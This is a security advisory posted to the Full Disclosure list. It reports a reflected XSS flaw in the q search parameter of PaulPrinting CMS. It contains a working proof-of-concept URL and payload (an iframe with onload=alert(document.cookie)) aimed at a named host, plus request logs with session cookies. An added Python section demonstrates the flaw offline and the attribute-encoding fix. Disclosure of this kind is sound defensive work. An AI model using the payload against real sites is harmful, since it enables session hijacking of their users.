
List:       full-disclosure
Subject:    [FD] PaulPrinting CMS - (Search Delivery) Cross Site Scripting Vulnerability
From:       "info () vulnerability-lab ! com" <info () vulnerability-lab ! com>
Date:       2023-07-19 7:11:33
Message-ID: b86e40c3-4982-c904-e8e4-ad23b03db8e5 () vulnerability-lab ! com


Document Title:
===============
PaulPrinting CMS - (Search Delivery) Cross Site Scripting Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2286


Release Date:
=============
2023-07-17


Vulnerability Laboratory ID (VL-ID):
====================================
2286


Common Vulnerability Scoring System:
====================================
5.2


Vulnerability Class:
====================
Cross Site Scripting - Non Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
PaulPrinting is designed to be feature rich, easy to use and search engine friendly, with a modern design and a visually appealing interface.

(Copy of the Homepage: https://codecanyon.net/user/codepaul )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a non-persistent cross site scripting vulnerability in the PaulPrinting (v2018) cms web-application.


Vulnerability Disclosure Timeline:
==================================
2022-08-25: Researcher Notification & Coordination (Security Researcher)
2022-08-26: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-17: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Open Authentication (Anonymous Privileges)


User Interaction:
=================
Medium User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
A client-side cross site scripting vulnerability has been discovered in the official PaulPrinting (v2018) cms web-application. Remote attackers are able to inject malicious script code into client-side requests in order to compromise user session data.

The client-side cross site scripting web vulnerability is located in the search input field of the delivery module (/account/delivery). The value of the q parameter is reflected into the value attribute of the search input without validation or HTML encoding. A double quote followed by a closing angle bracket therefore terminates the attribute and the input tag, and any markup that follows in the parameter is rendered as part of the page and executed by the browser. The request method to execute is GET and the attack vector is non-persistent (reflected): the payload travels in the URL and only affects users who open the crafted link.

Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to a malicious source and non-persistent manipulation of affected application modules.


Request Method(s):
[+] GET

Vulnerable Module(s):
[+] /account/delivery

Vulnerable Input(s):
[+] Search

Vulnerable Parameter(s):
[+] q

Affected Module(s):
[+] /account/delivery
[+] Delivery Contacts


Proof of Concept (PoC):
=======================
The non-persistent xss web vulnerability can be exploited by remote attackers with a low privileged user account and medium user interaction (the target user has to open the crafted link). For security demonstration or to reproduce the vulnerability follow the provided information and steps below.

PoC: Example
https://codeawesome.in/printing/account/delivery?q=

PoC: Exploitation
https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)>


--- PoC Session Logs (GET) ---
https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)>
Host: codeawesome.in
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie: member_login=1; member_id=123; session_id=25246428fe6e707a3be0e0ce54f0e5bf;
-
GET: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.1.33


Vulnerable Source:  (Search - delivery?q=)
<div class="col-lg-8">
<a href="https://codeawesome.in/printing/account/delivery" class="btn btn-primary mt-4 mb-2 float-right"> <i class="fa fa-fw fa-plus"></i>
</a>
<form class="form-inline mt-4 mb-2" method="get">
<div class="input-group mb-3 mr-2">
<input type="text" class="form-control" name="q" value="a"><iframe src="evil.source" onload="alert(document.cookie)">"> <div class="input-group-append">
<button class="btn btn-outline-secondary" type="submit" id="button-addon2"><i class="fa fa-fw fa-search"></i></button> </div></div>
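The reflection shown in the vulnerable source above, re-created as an added example that is not part of this advisory or of the PaulPrinting code base. The application is PHP; this Python reproduces the same pattern so it can be run offline. The form template is copied from the vulnerable source above and the payload is the advisory's PoC string; the names render_vulnerable, render_fixed, injected_tags and search_box_value are chosen here and do not exist in the product. The example shows that the PoC payload creates a live iframe tag when q is concatenated into the attribute unencoded, and that HTML-attribute encoding (the equivalent of PHP's htmlspecialchars with ENT_QUOTES) neutralises it while the search box still shows the user's original text.

```python
import html
from html.parser import HTMLParser

# Payload from the advisory's PoC: closes the value="" attribute and the <input> tag.
POC_PAYLOAD = 'a"><iframe src=evil.source onload=alert(document.cookie)>'

# Search form of /account/delivery, copied from the "Vulnerable Source" section;
# __Q__ marks the spot where the application reflects the q parameter.
FORM_TEMPLATE = (
    '<form class="form-inline mt-4 mb-2" method="get">'
    '<div class="input-group mb-3 mr-2">'
    '<input type="text" class="form-control" name="q" value="__Q__">'
    '<div class="input-group-append">'
    '<button class="btn btn-outline-secondary" type="submit" id="button-addon2">'
    '<i class="fa fa-fw fa-search"></i></button></div></div></form>'
)

# Tags that legitimately occur in the template; anything else was smuggled in via q.
TEMPLATE_TAGS = {"form", "div", "input", "button", "i"}


def render_vulnerable(q: str) -> str:
    """The flaw: q is written into the attribute exactly as received
    (the PHP equivalent is value="<?php echo $_GET['q']; ?>")."""
    return FORM_TEMPLATE.replace("__Q__", q)


def render_fixed(q: str) -> str:
    """The fix: HTML-attribute-encode q (&, <, >, " and ') before reflecting it,
    the equivalent of htmlspecialchars($q, ENT_QUOTES | ENT_HTML5, 'UTF-8')."""
    return FORM_TEMPLATE.replace("__Q__", html.escape(q, quote=True))


class _TagCollector(HTMLParser):
    """Records every start tag the way a browser's tokenizer would see it."""

    def __init__(self):
        super().__init__()
        self.tags = []  # list of (tag name, {attribute: value}) in document order

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def _parse(page: str) -> list:
    parser = _TagCollector()
    parser.feed(page)
    parser.close()
    return parser.tags


def injected_tags(page: str) -> list:
    """Names of tags that are not part of the template, i.e. markup that came from q.
    A non-empty list is the reflected-XSS condition the advisory describes."""
    return [tag for tag, _ in _parse(page) if tag not in TEMPLATE_TAGS]


def search_box_value(page: str) -> str:
    """Decoded value of the q search box, i.e. what the user sees in the input field."""
    for tag, attrs in _parse(page):
        if tag == "input" and attrs.get("name") == "q":
            return attrs.get("value") or ""
    return ""


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        page = render(POC_PAYLOAD)
        print(f"{name:10s} injected tags: {injected_tags(page)} "
              f"search box shows: {search_box_value(page)!r}")
```

The vulnerable rendering yields an injected iframe and a search box that shows only "a", because the rest of the payload became markup; the fixed rendering yields no extra tag and the search box shows the full payload as plain text. The same injected_tags check can be applied to a response captured from a real target for the PoC URL to confirm whether the reflection is encoded, without relying on a browser alert.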


Security Risk:
==============
The security risk of the cross site scripting web vulnerability with non-persistent attack vector is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and fitness for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com  www.vuln-lab.com  www.vulnerability-db.com

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team and the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to ask for permission.

Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE




_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/